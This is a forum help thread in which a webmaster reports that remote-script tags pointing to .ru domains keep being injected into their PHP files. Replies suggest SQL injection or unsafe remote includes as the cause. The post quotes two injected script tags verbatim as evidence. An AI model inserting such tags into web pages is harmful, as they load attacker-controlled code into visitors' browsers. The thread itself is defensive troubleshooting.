script added to files automatically

[circuit85]

Erroneous redirection script was added in to the PHP files on the server..

1st time, the script was:

<script src=http://www.vtg43.ru/script.js></script>

i modified the files, removed them, changed all my passwords, including FTP.

but again the second time, script was added automatically to files. this time it was,

]<script src=http://www.pkseio.ru/script.js></script>

when i checked out on net, i found out that these are sites related to SQL-injection attack.

please help me out. y is this happeneng and how to prevent it...

[jasonahoule]

Sounds like you have a form that is not doing any validation. Do you have content being pulled from a database?

[NogDog]

Does any page on your site do an include() or require() based on a URL or form value? If so, if you do not properly validate/filter that value, it's relatively easy to make the page include a remote file that could do all sorts of things, such as injecting links into all of your pages. (This is one reason that many hosts disable the allow_url_fopen PHP option.)

[circuit85]

well, i do have to get data from the dabase. but i checked the database for any erroneous injections but did not find anything fishy..

regarding includes, i have used includes but that is for my functions wit a file on my own server..havn't used require() though..
thanx for your replies friends..i wish my problem is solved as soon as possible..waiting for further replies